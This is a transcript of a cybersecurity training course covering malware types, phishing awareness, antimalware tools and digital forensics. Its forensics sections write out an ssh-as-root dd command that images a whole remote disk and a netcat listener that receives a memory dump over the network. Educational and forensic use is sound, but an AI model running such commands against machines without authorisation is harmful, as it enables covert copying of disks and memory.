about occurrences of ransomware. So in various ways, this malware is triggered, such as opening an infected
document or clicking a link. And what happens is, it could infect files by encrypting them and requiring a
ransom payment before potentially providing a decryption key. In this video, we talked about viruses.
identify worms
[Topic title: Worms. The presenter is Dan Lachance.] In this video we'll discuss worms. Worms are a form of
malware that is often delivered through a Trojan mechanism. Now a Trojan means that the user has something
that appears to be benign, such as usable software that they might download and install. When in fact, that is
simply used as a tricking mechanism to deliver the malware to the user's PC or smartphone. Worms are self-
propagating over a network so they don't require an existing host file to attach themselves to. Worms get
spread when one machine gets infected either due to some kind of a vulnerability exploit. Or through social
engineering which is tricking the user into downloading something, or clicking a link, or opening a file
attachment. With a worm, network transfer is used to copy itself to other systems. So again, it's self-
propagating. This can be done through file and print sharing over the network, FTP, file transfer protocol, SSH
or secure shell, which is used to remotely administer network devices like servers, routers and switches over
the network. It can be transferred through email and instant messaging.
So basically, through many common communication techniques is how worms can spread themselves. Worm
infections, once they actually run, other than spreading themselves, might spy on computing habits. They
might steal sensitive information, such as sensitive files stored on your computer or that are accessible
elsewhere through your computer, such as on a database server or in the cloud. Or a worm might monitor
keystrokes. It might be a key logger and send those back to malicious users. Also a worm could redirect users
to fraudulent sites. So for instance, a worm could modify the local system's HOSTS file which is checked
before DNS servers to resolve names to IP addresses. So with this example, a malicious user might spy on your
habits and take note of your preferred bank for online banking. And then might make a HOSTS file entry that
redirects the same URL to a website under their control that looks just like the real banking site. But it's really
just designed to steal your banking credentials before displaying a message about the bank experiencing
technical difficulties. Worms, of course, can also consume enormous amounts of network bandwidth, which
could be an indication that this infection is underway. In this video we discussed worms.
[Topic title: Spyware, Adware. The presenter is Dan Lachance.] In this video, I'll discuss spyware. Spyware is
a form of malware, and like most malware, it installs and runs without the user knowing about it. Spyware,
specifically, is designed to secretly or covertly gather information about things like our computing habits, the
software that we use, files that we access and the contents within them, perhaps. As well as gathering
keystrokes that we might enter as we type on the keyboard. Including when we authenticate to various
resources, like internal servers, so it would reveal our credentials if we're using username and password to
authenticate, and also things like online banking and so on. So therefore, spyware gathers data that could be
very valuable for marketing purposes. So the motivation is clear, it could be for financial gain or it could be to
gather credentials to further compromise other systems or networks. Adware is another form of malware. And
like all malware, it installs and runs normally without user consent. However, that's not necessarily always the
case. Adware is designed to display appropriate advertisements. Now, what does appropriate mean in this
context? It means based on your computing habits, it somehow monitored what you've been doing, what
you've been searching for, and looking at on the Internet and displays related advertisements.
So it might look at things like sites that were visited, searches that were conducted, and just generally how the
computer is used. We want to be careful when we install free software. Because this is an example of how
spyware or adware might be installed and really not maybe specifically with our consent, but we had the option
to uncheck something that we didn't. So when you install free software, sometimes you have to be aware of
additional software installed with it. And if all you're doing is, in a rush, installing free software and clicking
Next, Next, Next through the installation wizard, you might not read a message that tells you it's going to
install something, like another browser plugin. Where, if you were a little less hasty, you could have
unchecked that additional software installation. Because it itself might be spyware or adware. So, basically, be
careful, take your time, it's all about being suspicious, to be honest, about these things. And read all
agreements before you install things like free software. Now of course, as is the case with all malware, we
want to make sure we're running up-to-date antimalware software on every network device. Now, this might
even include installing a browser plugin to block ads. But again, be careful. Because sometimes malware
shows up itself as being antimalware. So be very careful. In this video, we talked about spyware and adware.
[Topic title: Ransomware. The presenter is Dan Lachance.] In the real world, a ransom payment is required
when something of great value to somebody is being held by an unauthorized party. In this video, we'll talk
about ransomware. Ransomware is a rampant form of malware that is spreading all over the world in 2016,
although that's not when it began. But it seems to be more prevalent than ever, now. In it's most common form,
ransomware will encrypt files where the victim has write access to files. That includes locally on a device and
even over the network, including into the cloud. So what happens is, when a malware infection, which is
ransomware, initiates it will contact a command center on the Internet awaiting instructions from the malicious
user. A ransom payment is demanded. And in turn, the attacker will provide a decryption key, or so they claim.
Other variants of ransomware would prevent computer access, maybe upon boot up. It requires some kind of a
special code, and unless payment is received, then the code is not provided. So therefore, the system is not
usable. Now, ransomware scare tactics include legitimate looking logos or sites that look like the real thing,
but in fact, are not.
Now, often, these scare tactics would include messages that appear to be coming from law enforcement. For
example, if you're on the Internet conducting searches, you might get a pop-up message that even includes the
local law enforcement logo that looks legitimate and demands payment. Otherwise, you could face
imprisonment based on what you've been looking at in the Internet. The same kind of thing also happens
through tax agencies. Everybody has to pay taxes, but many people don't like it, and they're very much afraid
of the taxing authorities. So if we get a message, whether it's a pop-up in our browser or an e-mail message
saying that either we have a tax refund, or in terms of a scare tactic, telling us that we owe tax money in
arrears, most people will be fooled into thinking that they must do this. And, in fact, when they submit a
payment, it's actually going to the malicious users. Consider the example on-screen, which is a real e-mail
message that I received a while ago. [A screenshot of a fraudulent mail is displayed in which the sender's e-
mail address is fake. The mail includes a link titled Your request can be made here.] This message claims to
be from the Canada Revenue Agency, but up at the top, if we take a look at the e-mail address, that does not
look legitimate. And, essentially, I can make a request simply by clicking the provided link, to claim my
refund of $318.12 in Canadian funds. Now, of course, this is not a legitimate e-mail message, it's a phishing e-
mail.
And when I actually click the link, it might simply gather some personal information about me. Or, it could
infect my computer and perhaps even encrypt files using ransomware. Consider this second example where we
have a message in a browser that appears to come from the Royal Canadian Mounted Police that says that all
of the files on our machine are encrypted. [A screenshot of a web site purporting to be the web site of the
Royal Canadian Mounted Police is displayed.] And this is due to a violation on our part of some kind of law,
whether it's copyright infringement, viewing or distributing prohibited pornographic contents, or some kind of
illegal access from our PC. Now, of course, unsuspecting victims get afraid and will pay a ransom, and also
pay a fine of some kind so that they get their machine back and also avoid imprisonment. It's just another scare
tactic invoked by scammers. So any time you get these messages or e-mail, it could be e-mail or a web pop-up
or something like that from some kind of authority, like another government agency of some kind, always
question it twice. And if you need to, make a phone call.
Don't just click on links randomly because you feel threatened in some way based on the message that you're
seeing. With a ransomware infection, this can often be propagated by downloading Internet files, or by
installing software that appears legitimate, but might also be infected as well. We might infect our machine
with ransomware by visiting a webpage, by clicking a link, either on a webpage or through e-mail, even by
opening an e-mail file attachment that has some kind of an autorun virus. Ransomware payment is usually
requested in Bitcoin, where Bitcoin is unregulated. That doesn't necessarily mean it can't be traced, but it's not
regulated by any single governing authority. However, even if you make a ransomware payment, there is no
guarantee that you will get a decryption key or a code to unlock your computer.
However, in some cases, ransom payment may actually be cheaper than spending the time to recover systems
and data through imaging and through backups. That's not to say that we should pay ransom, but it's just a
general consideration. Encryption mechanisms for ransomware might be through a Microsoft Word macro
virus that executes PowerShell commands. So we should always run up-to-date antimalware software. And, of
course, user awareness. Users need to be aware of how these infections actually occur, because it only takes a
single user to click on one link, or open one file attachment, to bring down the entire network. So users must
understand that they should never open unexpected file attachments or click links sent via e-mail. If they don't
know what to do, they should open a help desk ticket, and then we can escalate it further. The other thing is to
make sure that we have frequent and working backups. Because if by chance we do get hit with some form of
ransomware, we need an alternative way to get our data back. And hopefully, our data is recent and it works.
In this video, we discussed ransomware.
[Topic title: Antimalware. The presenter is Dan Lachance.] In this video I'll demonstrate how to work with
antimalware. antimalware is software that will try to detect, catch, and maybe quarantine or remove malicious
software, whether that be in the form of worm, a Trojan, or a virus attached to a file and so on. And it's critical
that we have antimalware software up to date on every device on the network including smartphones. Here in
Windows 10 I'm going to go ahead and launch the Windows Defender antimalware, although there are many
different vendors that offer solutions. [Dan launches Windows Defender from the desktop. The Windows
Defender window opens which displays three tabs named Home, Update, and History. The window includes
three scan options and a Scan now button.] Here I can see that real-time protection is turned on. [The Home
tab is selected by default and options such as real-time protection and Virus and spyware definitions are
displayed. There are two links for Settings and Help in the top right-hand side section of the window.] So that
means not only will it scan for malware on either a manual or a scheduled, triggered basis, but it's always
watching what is happening on the machine. Whether I'm opening email file attachments or opening files from
inserted USB thumb drives and so on. I can also see that the virus and spyware definitions are up to date on
this machine. Down below, I can also when the last scan was conducted. Here it says September 14th, 2016
and it was just a quick scan. Over on the right, I can manually trigger a quick, full, or customized scan on
demand.
So for example, if I were to choose Custom, and choose Scan now, I can then choose which drives and folders
that I want to scan. [The Windows Defender dialog box opens which displays the drives and folders which can
be selected for scanning. The window includes two buttons named OK and Cancel.] However, I'm going to
cancel that. Under the Update tab, [Dan clicks the Update tab which includes the update definitions
button.] we can see here our virus and spyware definition database is up to date. And we can see the date and
time at which that applies. We can also see the specific version of our virus and spyware definitions, which can
be important when troubleshooting. Now we also have a button here where we can manually click on Update
definitions. Under the History tab, [He clicks the History tab it includes the View details button.] we'll have a
history of any quarantined, allowed, or detected items. Here I'm going to choose All detected items and I'll
click the View details button. Here we can see at one point it detected a Trojan on this machine. The alert level
was severe. This is the date on which it was detected and then, of course, it was quarantined. [The History tab
now displays the Remove all button.] Now at this point, I do have the option, of course, of removing that
Trojan from this host. In this particular software, Windows Defender, we can also click on the Settings link in
the upper right. And when I do that, [The Update & Security settings window opens. The window is divided
into two sections. The first section displays many tabs such as Windows Update, Windows Defender, and
Backup. The second section displays information related to the selection made in the first section. The
Windows Defender tab is selected by default and the second section displays many sections such as Real-time
protection, Cloud-based protection, Exclusions, Version info, and Automatic sample submission.] it spawns
the Update and Security settings here in Windows 10, where Real-time protection can be turned on or off,
where Cloud-based protection can be turned on or off. So the Cloud-based protection will send information
about detected malware on our computer to Microsoft. We also have the option, if we scroll further down, and
we do in every antimalware type of solution, we can exclude certain types of files or folders that we know will
trigger a false positive.
So I could exclude a file or a folder. [The ADD AN EXCLUSION window opens which displays sections such
as Files and folders, File types, and Processes.] Here I've got a folder I've excluded where I've got some live
hacks stored for testing purposes. We can also exclude certain file types or individual processes. Larger
networks will work with antimalware from a centralized tool. [He switches to the System Center Configuration
Manager window. The window displays many buttons such as All Objects, Saved Searches, and Close. Below
these buttons, the window is divided into two sections. The first section displays the Assets and Compliance
subsection along with tabs for Assets and Compliance, Software Library, Monitoring, and Administration. The
Assets and Compliance tab is selected by default. The second section displays information related to the
selection made in the first section. The Assets and Compliance subsection displays the Overview node which
includes many subnodes such as Device Collections, Asset Intelligence, Compliance Settings, Endpoint
Protection, and All Corporate-owned Devices.] In this case, we're looking at System Center Configuration
Manager 2012. Where we've already gone to the Assets and Compliance work space in the bottom left. Well,
on left-hand navigator, I'm going to expand Endpoint Protection. System Center Endpoint Protection, often
referred to as EEP, is the antimalware solution included with SCCM, although it must be licensed separately.
So notice here on the left we can click on Antimalware policies. [The Endpoint protection subnode includes
subnodes such as Antimalware Policies and Windows Firewall policies.] And on the right, any antimalware
policies that were created, of course there's a default one, will be listed. So for instance, I'm going to go ahead
and double-click on the Default Client Antimalware Policy to open up its settings. [The Default Antimalware
Policy window opens. The window is divided into two sections. The first section includes many tabs such as
Definition updates, Advanced, Exclusion settings, Real-time protection, Default actions, and Scan settings.
The Scheduled scans tab is selected by default.] Where on the left, if I click Scan settings, on the right I see
Scan settings, such as whether we should be scanning email and attachments or removable devices like USB
drives. Or should we scan network drives when conducting a full scan? Should we scan archived files, and so
on. Now also, we can click Real-time protection over on the left to determine whether real-time scanning is
turned on and exactly how that is configured.
We have Exclusion settings. Under Advanced over here, we can determine whether our System Restore point
should be taking on clients before the machine is cleaned, and so on. So finally, the last thing we'll talk about
with this solution is the Definition updates over here on the left. Where we can determine exactly, [He clicks
the Definition updates tab and the second section displays buttons such as Set Source, Set Paths, OK, and
Cancel.] by clicking the Set Source button, where the updates come from [The Configure Definition Update
Sources window opens. It displays many definition update sources to be contacted.] and how often they are
applied. So really, we're doing the same kind of thing that we could do on a single station. The difference
being that we're doing it centrally and it could potentially apply to thousands of computers. Because here in
SCCM, [He exits the Default Antimalware Policy window. The System Center Configuration Manager window
displays two Antimalware Policies, Default Client Antimalware policy and Toronto Antimalware Settings for
Endpoint.] when I right-click on a policy, now the default client policy doesn't give me the option to deploy it
to a specific collection. But if I've built a custom policy I can determine, [He right-clicks the custom policy
and from the shortcut menu, chooses Deploy.] by choosing Deploy, exactly which collections that these
antimalware settings will apply to. [The Select Collection dialog box opens.] The default settings apply to all
devices managed by this SCCM site. So there are enterprise-class tools to essentially work with things like
antimalware. And of course, if I go to the Monitoring workspace over here on the left, [He clicks the
Monitoring tab.] and if I expand, Reporting and Reports in the left-hand navigator, I'll see that I have some
report categories. [The Reports subnode displays many subnodes.] Some of which are related to working with
things like malware. So for example, if I were to click on Reports and then click the Search bar at the top and
then simply type in malware to search for reports that have that term in it. We can see we've got a number of
antimalware reports that we can run.
Now what about zero day exploits? [The Enhanced Mitigation Experience Toolkit window is open. The
window includes buttons named Wizard, Apps, and Trust.] Those that aren't yet known to the system owner or
vendors of hardware and software but, of course, are known to malicious users. Well, there are different tools
we can use to mitigate those types of problems. Here I have installed and launched the Enhanced Mitigation
Experience Toolkit, or EMET. This is a free Microsoft tool. Let's go ahead and expand it and work with it a
little bit. The overall purpose of this tool is to prevent vulnerabilities in our software configurations, whether
it's operating system or apps, from being exploited. Even though there might not be a specific exploit signature
for this type of activity. Here in the bottom screen of EMET, we can see the list of running processes and
whether or not they are running EMET. So we can see none of them are. We see a list of running processes on
this host. So what we're going to do then is click the Apps button up in the toolbar where we can add an
application that we want EMET to monitor. [He clicks the Apps button and the Application Configuration
window opens.] We can see some standard apps here like iexplore.exe for Internet Explorer, WordPad,
Outlook, Word, Excel, PowerPoint, Access, Publisher, and so on. What I'm going to do is click the Add
Application button way up at the top. And we're going to go here into drive C on this machine.
We're going to go to Program Files. And we're going to scroll down and go into 7-Zip where we're going to
choose the 7z.exe program to make sure that we monitor it for any kind of vulnerability exploits. 7-Zip is a
compression tool. I'm going to go ahead and click Open. And we can see that 7-Zip has been added and most
of the check marks for these mitigations are enabled. For example, ASR stands for Attack Surface Reduction.
ASR really is concerned primary with things like browser plugins, things related to Java plugins, PDF reader
plugins or Flash plugins. EAF over here on the left stands for Export Address Table Access Filtering. What
this allows EMET to do is to capture any Windows API calls that are triggered from potentially harmful or
suspicious locations, such as an ActiveScript running on a web page. So besides just antimalware we can also
use tools such as Microsoft Enhanced Mitigation Experience Toolkit to prevent bad things from happening on
a device.
7. Video: User Training and Awareness (it_cscybs_11_enus_07)
After completing this video, you will be able to explain why user training and awareness is one of the most
important security defenses.
Objectives
explain why user training and awareness is one of the most important security defenses
[Topic title: User Training and Awareness. The presenter is Dan Lachance.] Many network infections still
occur from inside the network and not necessarily due to malicious users, but rather a lack of user awareness.
In this video, we'll talk about user training and awareness, which really turns out to be the single most effective
defense against threats. During user onboarding when we are hiring new employees, whether they be IT
technicians or not, it doesn't matter, everyone needs to be involved. User onboarding needs to include security
documentation for new employees, as well as training about security threats. We might also conduct ongoing
lunch and learn sessions for existing employees since the threat landscape is ever changing. We might also
have colorful and interesting and fun IT security posters in the office to increase general awareness about
security threats. We might also include some kind of a security tips and hints web site. Also, monthly company
newsletters are often done in larger organizations. They have news about the organization, maybe employee
birthday announcements. But they should also include some information about security awareness. So ongoing
IT security awareness and training is absolutely paramount. Now what should users do about this? Well,
through their awareness training, they should be made aware of social engineering. Essentially, it might be
cynical, but users must become of the mindset that everybody is trying to trick them. Because in this day and
age of digital communications, it's quite easy to receive an SMS text message on your phone that you didn't
ask for or the same thing is true of receiving an email message in your inbox that you didn't ask for.
So therefore users need to be vigilant about suspicious people, physically, that they might notice on a property
or in the building, but also suspicious about computer activity. So therefore, part of user training and
awareness needs to include who should be notified when suspicious people or computer activity is noticed.
Users must also be trained to pay attention to free software installation options, where additional software
might be installed, including spyware. Now in some cases, many corporate enterprises will prevent the
installation of user software, unless performed by an IT technician. Then there's always the telling of others
about IT security to spread the word about what to watch out for. Pictured on the screen, we can see a
screenshot of somebody downloading a file attachment, which apparently comes from Western Union for a
money transfer. But we can see the antivirus message about this being a Trojan. [He switches to the MS
Outlook window where an inbox is displayed.] Consider on the screen this email message that appears to be
from the Bank of Montreal or BMO, that tells me in the subject line that login has been disabled but the date
and time. Now if I click to open up that email message, I can see the detail about that message. Now, take a
look up at the email address up at the top, utah.edu. That doesn't look like it's coming from the Bank of
Montreal Internet domain name. Here it tells me that my online web portal login has been temporarily disabled
due to too many unsuccessful login attempts.
So my bank account is locked and so are all of my funds, and I've got a nice convenient link here I can click to
reset my password so I can continue with online banking with Bank of Montreal. Of course, the strange thing
is, I am not a Bank of Montreal member and even if I was, banks and law enforcement agencies and
government agencies will never contact you in this way asking you to click a link. It just doesn't happen, the
problem is a lot of people don't know this. So what should users watch out for? Users should not download
BitTorrent files or hastily install free software without reading the terms of agreement or installing additional
plug-ins. Users should never visit illegal web sites of any kind. They should never open unexpected email file
attachments or click links in email messages, especially if it's not something that they asked for. Now, in some
cases when you try to login to a web site, if you forget your password, you'll click the Forgot Password link.
And it will send an email message to reset the account to your email address. In that case, you triggered it, but
if you get email messages about resetting passwords that you didn't ask for, it's a scam.
So users must never be fooled by this and if they're not sure, they need to contact the help desk to find out if
it's legitimate or not. Other security awareness topics for users include physical security, such as making sure
they don't leave sensitive documents on the top of their desks. Making sure that they use lockdown cables for
laptop computers and that they don't leave USB thumb drives or smartphones in airports or forget them on
coffee tables at coffee shops. So a clean desk policy, password security, the shared use of work devices should
always be discouraged. Wireless network security must be made known to users in the sense that it's very easy
for a malicious user to create a rogue access point that looks like a legitimate wireless access point. Once the
user associates with that access point, the attacker potentially could see sensitive information that the user is
sending through that wireless access point. We now know of the danger of phishing email messages because
we've looked at a few examples here. And, of course, we know about malware and how it can be delivered and
once a machine is infected what it might do, such as spying on your computing habits or encrypting files that
you have write access to. In this video, we talked about user training and awareness.
After completing this video, you will be able to describe digital forensics.
Objectives
[Topic title: Digital Forensics Overview. The presenter is Dan Lachance.] In this video, we'll have a chat
about digital forensics. Digital forensics is the collection and investigation of digital data. The term triage
relates to this in that it allows for the prioritization of forensic tasks. Whether we are going to a suspect's
premises to seize equipment, or data on the equipment, or even trying to seize data stored in the cloud. The
integrity of evidence needs to be maintained. We must follow the chain of custody so that we can always track
who had access to collected evidence and where and how it was stored. Hashing allows us to get a unique
value for data that can be used in the future to detect changes. So therefore, we can verify a hash prior to
analysis of seized data to ensure that it matches the acquisition hash, so we know that nothing's been changed.
We can also use tamper-proof seals for physical evidence to ensure that data is kept safe, and equipment. All
activities need to be documented when gathering and then storing evidence. Data sources for digital forensics
includes network transmissions, log files, data files, even the swap files that are used for temporary storage of
memory pages. As well as active memory RAM pages, which could include information related to active
network connections at a specific point in time or running processes running on a specific point in time which
could be crucial in getting some kind of a conviction in a court of law.
Naturally, if we are going to use these data sources they have to be trustworthy as do the date and timestamps
associated with them. Other data sources include disk partition tables, the contents of boot sectors, file
allocation tables, which are used for every file system on a disk partition. Things like cloud backups might be
used. So if we seize a suspect's mobile phone, for example, there might not be anything incriminating on it, but
if we track its access to cloud services, there might be something that was backed up to the cloud that could be
of value. And in some cases, cloud backups are automated, which might even be unknown to a suspect. Then
of course, digital forensic media can gather data from removable media, which includes USB thumb drives and
external hard disks and so on. Forensic analysis then analyzes the data after we've got an acquisition hash.
Now, the term big data is being thrown around a lot these days, and it refers to the large volumes of data that
must be processed to look for something meaningful. And that certainly applies to forensic analysis because
depending on how much data is gathered, there is a specific amount of time that's required to parse and
produce results from those large data sets. So often what gets used in forensic analysis are some kind of
clustering solution such as BinaryPig on Hadoop clusters, where we've got multiple computers working
together to process data.
And this is also easily deployed in the cloud where we can very quickly spin up clusters for big data forensic
analysis, and once it's finished, we can then deprovision it so we're no longer paying for the use of that
clustering service. For example, consider the Amazon Web Services that are available with users that have
accounts to Amazon Web Services. [He switches to the amazon web services web page. The page is divided
into two sections. The first section displays many subsections such as Compute, Developer tools, Analytics,
and Internet of things. The second section displays subsections such as Resource Groups and Additional
Resources.] If I scroll down on the main page under Analytics, I can click on EMR, which is Elastic Map
Reduce, which is a managed Hadoop framework to basically run large scale analytics on large data sets [He
clicks the EMR icon.] . So from here I can click on the Create cluster button to begin defining my
configuration to process large volumes of data, [The page displays information on the Amazon Elastic
MapReduce.] which could be very useful for forensic analysis. In this video, we discussed digital forensics.
During this video, you will learn how to determine which forensic hardware is best suited for a specific
situation.
Objectives
In this video, you will learn how to determine which forensic software is best suited for a specific situation.
Objectives
[Topic title: Digital Forensics Software. The presenter is Dan Lachance.] Just like a carpenter requires a
toolbox with the correct tools to ply their trade, the same thing is true of a digital forensics analyst. They need
the correct hardware and software. In this video, we're going to talk about digital forensics software. So
besides having to correct hardware for disk imaging or even things like crime tape to seal off a scene, at the
software level there are some commonalities within digital forensics software. Most of them will support write
blocking to protect any changes being made to originating data. This is often done through file and metadata
hashing. A hash is a unique value based on the state of data, in this case, when it was acquired. And we want to
do that before we perform any kind of data analytics on acquired evidence. So, commonalities of digital
forensics software also includes the preservation of original evidence, safekeeping and tracking and correct
date and timestamps. So often this will be conducted from a digital forensic workstation where, it might also
perform OS and process analysis. Looking for anomalies or looking to date and timestamp the state of an
operating system and running processes at the time of evidence acquisition. There's also, in the same way, file
system and RAM analysis at the time of evidence acquisition. Some digital forensics software that can be used
is built in to operating systems like the standard UNIX and Linux dd, or disk dump command. This can also be
used locally, as well as remotely over the network, where we can capture slack and unallocated space on a
disk, not just capturing what's in use. This way we can track things that were removed in the past.
We can also send captured data using disk dump to a specific TCP or UDP port. Pictured in our
example, [Dan refers to following code: ssh [email protected] dd if=/dev/sda of=/acquired/disk1.img. Code
ends.] we can see over the network a forensic analyst executing the ssh command to connect as root over the
network to a device with a specific IP address and then remotely running the dd command. Now the dd
command specifies an input file, in this case /dev/sda, the entire disk. And the of command for output file
where we're storing data in an image file called disk1.img in an acquired folder. Now you must be careful
when gathering evidence as to where you store this. Here it's being stored on the remote machine that we're ssh
actioning into. But also any forensic analysis that captures that state of network connections and so on must
account for the fact that we are connecting over the network to gather this evidence. The forensic toolkit is
often called FTK. This is a widely used toolkit that includes many different forensic analysis tools such as
those related to disk scanning, deleted file recovery. It supports disk imaging and hashing. It also supports
distributed processing for processing big datasets when we're conducting forensic analysis. This can be used to
reduce case processing time. EnCase is another popular digital forensics tool suite that contains things that
support automation by exposing APIs.
It supports eDiscovery, or electronic discovery, of evidence and also forensic data recovery and analysis. The
BlackBag MacQuisition tool is for Macintosh forensic imaging and analysis for MacBook Pros and MacBooks
and MacBook Air devices. However, it's not designed to acquire data from iPhones or iPads. The X1 Social
Discovery tool is also another eDiscovery tool focused on social media content. As related to sites like
Facebook, Twitter, and LinkedIn to name just a few, as well as visited websites and YouTube activity. Other
common forensic software titles include various password crackers, such as Cain and Abel, or the Helix tool,
the Sysinternals Suite, and Cellebrite. In this video, we talked about digital forensics software.
After completing this video, you will be able to explain how forensic tools can be used against data stored on
media.
Objectives
explain how forensic tools can be used against data stored on media
[Topic title: Digital Forensics and Data at Rest. The presenter is Dan Lachance.] In this video, I'll talk about
digital forensics and data at rest. Data at rest is data that is stored on some kind of storage media. Often, when
we conduct forensic analysis and evidence gathering, we must use specifically approved tools. For example,
we might have to use Encase or the Forensic Toolkit imager tool. What we must do when we gather data at rest
for evidence is encrypt forensic images for safe keeping. We must also follow the chain of custody to ensure
that all activity related to gathered evidence, where it's stored, how it's stored, who had access to it, this all
must be logged diligently. Otherwise, the data might be deemed inadmissible in a court of law. Forensic
images can then be mounted for analysis purposes. Now, the options and visibility of the data when that
forensic image is mounted, really depends on the tool that's being used to mount the forensic image. A forensic
clone is a duplicate of a disk, whereas a forensic image is a file that contains a duplicate of the data from a
source disk. Now, forensic images are much more common than forensic clones.
The Encase file format for example, is very common, where it uses an E01 evidence file image format.
Forensic disk images can be taken of the traditional hard disk drives, or HDDs, which are the traditional
magnetic hard disks with spinning platters, or the newer SSDs, or solid state drives. Forensic disk images are a
bit-level copy of a disk partition that reflects the file system at a specific point in time. It also includes slack in
unallocated space on the disc, which can be useful to see deleted file remnants. Timestamps are crucial in
terms that they be trusted from a trusted time source. File hashes are also important that they are taken of
acquired data before we actually analyze the data and potentially make changes, despite the fact that we might
be using hardware or software write-blockers. With digital forensics and data at rest analysis, live imaging
means that the system is not powered down when we are acquiring disk images. Now, this is crucial if disk
encryption is in use on a suspect's machine and we don't have the decryption key.
Many disk encryption solutions protect data at rest when the system is powered down or if someone physically
steals the disk. But when the operating system is up and running, often, the disk volume contents are decrypted
and are therefore usable as usual. Dead imaging refers to the acquisition or analysis of disk data when the
system is powered down. So, often, the disk is removed and disconnected from that station and instead
connected to a forensic station. Now, hardware and software write-blockers can prevent data alterations when
we make a copy of that data. In this video, we discussed digital forensics and data at rest.
[Topic title: Common Digital Forensic Tools. The presenter is Dan Lachance.] In this video, I'll talk about
common digital forensic tools. So, why are there specific forensic tools? Well, first of all, often they're use for
evidence gathering, whether it's hardware or software. And at the same time, we need to wait here to the Chain
of Custody, where access to acquire evidence or how data is acquired for evidence is documented along every
step. There's also the trustworthiness of data that is gathered to make sure that we know that we've original
data and we can track whether or not it's been modified. And also having a trustworthy date and time stamp
source. There are open and closed source tools that can be used for digital forensic analysis. Forensic tool
categories begin with image capturing. Tools that do this work with things like storage media, whether it's an
external USB drive, an internal disc array, or an SD card and so on, where often, they are hashed. Now, by
hashing an entire file system, we are generating unique values for everything on that file system, all the files,
so that if there are any changes made in the future, we can detect that changes were made. There are also ways
to capture volatile memory or RAM contents, physical memory. So we can acquire that locally. For instance,
by running a tool on a machine that's on, acquiring a memory dump and perhaps storing it on removable
media. Or, the memory dump data could be sent over the network to another host.
There are also email forensic tools. Part of what they will do is take a look at SMTP headers. SMTP headers
are essentially metadata about the email message, including the path that was used to send it. And sometimes,
different mail systems will form SMTP headers in different ways. And we might even check to see how the
fields in the SMTP header are constructed to determine if the SMTP message in fact was forged. There are also
ways and tools to take a look at encrypted and digitally signed message and to take a look at the safekeeping of
private keys. Private keys are used to actually create a digital signature, which is used to verify the authenticity
of a message. And private keys are also used to decrypt messages encrypted to an individual. Other forensic
tool categories relate to the database level, where we can dig down into the database and its tables and look at
the data itself and also the metadata. We can also determine if row updates occurred and who did them. And
we can also analyze specific transactions used by a back-end database system. Network forensic tools are
designed to capture network traffic, but their placement on the network can be important so that they're
capturing the appropriate traffic.
For example, in a standard Ethernet switched environment, when we're plugged into one port in the switch, we
only see the traffic sent to that port from other devices on the network. Of course, that's besides multicasts and
broadcasts. We also have to bear in mind the ease with which packets can be spoofed using freely available
tools when we are capturing traffic for forensic analysis. Other forensics tools categories can include mobile
devices. Where we've got tools that can actually take a copy and hash of SIM card contents. Most mobile
devices these days also have some form of cloud backup. So, often, a digital forensics investigator will have to
take a look at any cloud account information that was synchronized from that mobile device up into the cloud.
A faraday bag, or cage, is used to make sure that we don't have any signals that can be transmitted or received
via wireless device. Finally, we might even take a look at the carrier themselves, for example, a telecom
carrier, and ask for their logs related to activity on a given smartphone. There are built-in operating system
tools that we can use for things like forensic analysis. So think, for example, of the Unix and Linux dd or disk
dump command, which can actually be used to take a copy of an entire disk or partition. There's also the built-
in Unix or Linux md5sum command, although that may vary from one distribution to the other, but it allows us
to take a filehash. On the Windows side, we can use the Get-filehash PowerShell cmdlet to take a hash of a
file. Then of course, there are numerous external tools that can be used by forensic analysts, including Encase,
the forensic toolkit or FTK, and Helix. In this video, we talked about common digital forensic tools.
After completing this video, you will be able to explain the sequence of steps that should be followed when
conducting mobile device forensics.
Objectives
explain the sequence of steps that should be followed when conducting mobile device forensics
[Topic title: Mobile Device Forensics. The presenter is Dan Lachance.] In this video, we'll have a chat about
mobile device forensics. When we have a locked phone that we need to gather evidence from, it can present a
problem. Because attempting to unlock the phone itself will change the device data. Web browser cookies, for
example, Safari web browser, stores cookies in /private/var/mobile/Library on an iPhone, can be viewable with
a HEX editor or using an iPhone Extractor tool. There's also the call history on a mobile device. For example,
the iOS uses SQLite data stored in /private/var/Library/CallHistory to store call data. Now, interestingly, when
it comes to locked phones, it really depends how important it is to law enforcement to get into it. If you think
about the fact that the FBI in 2016 paid a company $1 million as a one-time fee to be able to break into the San
Bernardino shooter's iPhone. Other data sources for mobile device forensics includes the memory on the
phone, as it's running.
Internal and removable storage media. Network traffic into and out of the mobile device. Logs for things like
the operating system of the mobile phone as well as for apps. SMS text messages. SIM card contents, which
could include phonebook entries, as well as SMS messages. So we should be able to create an image of an
entire mobile device file system and generate hashes before we start analyzing that acquired data. Common
Android tools related to forensics include, Logcat, ClockworkMod Recovery, Linux Memory Extractor, as
well as the Android SDK. Now some tools may require rooting the device so that they have full access to the
device. Common iOS tools for Apple mobile devices include iTunes Backup. So, just because we seized an
iPhone for example, and there's no relevant data that we can see on the device, perhaps that data existed in the
past and was backed up through iTunes Backup in the cloud. There's also other tools for iOS devices, like the
iPhone Analyzer, iPhone Explorer and various tools available with the Lantern Forensics suite. On the iOS
side, some tools might actually require jailbreaking the device so it has full access to the iOS device. In this
video, we chatted about mobile device forensics.
[Topic title: Creating a Physical Memory Dump. The presenter is Dan Lachance.] During forensic evidence
gathering, it can sometimes be critical that we capture an image of what was happening in memory, electronic
memory or RAM at the time that evidence was seized. There are many ways we can do that and in this video,
we're going to learn how to create a physical memory dump. Now there are plenty of tools that will run on
Windows, Unix, and Linux. Some of the tools might run off a USB thumb drive that you plug into the machine
itself, whose memory you want to get a dump from. And then maybe you would store the memory dump on a
USB removable drive or send it over the network. [The root@kali window is open.] The way that we're going
to do it here is we're going to begin in Kali Linux using a Netcat listener, or nc as you can see with the
command. We're going to listen for connections over the network where we can receive a memory dump taken
of a machine elsewhere. So the command here in Kali Linux is nc, for Netcat, -l for listen, -vvv. Basically, the
more Vs you have, the more verbose the output is, believe it or not. -p for the listening port, which here is
going to be 8888. And then that's followed by the redirection symbol, the greater than sign. So that we're
redirecting whatever we receive through this port to a file on this Linux host called clientmemdump1.dd. Let's
go ahead and press Enter to start that listener on Kali Linux. And now it says listening on [any], which means
any interface on port 8888. So I'm looking at a Windows machine where Internet Explorer is connected to a
banking website. [The rbc.com web site is open in Internet Explorer.] What we want to do is get a memory
dump of this machine. So there are many ways to do that. What we are going to do is go to the Start menu and
go to My Computer, where we've got a tool that was downloaded than can actually acquire a memory dump
and send it somewhere, like over the network.
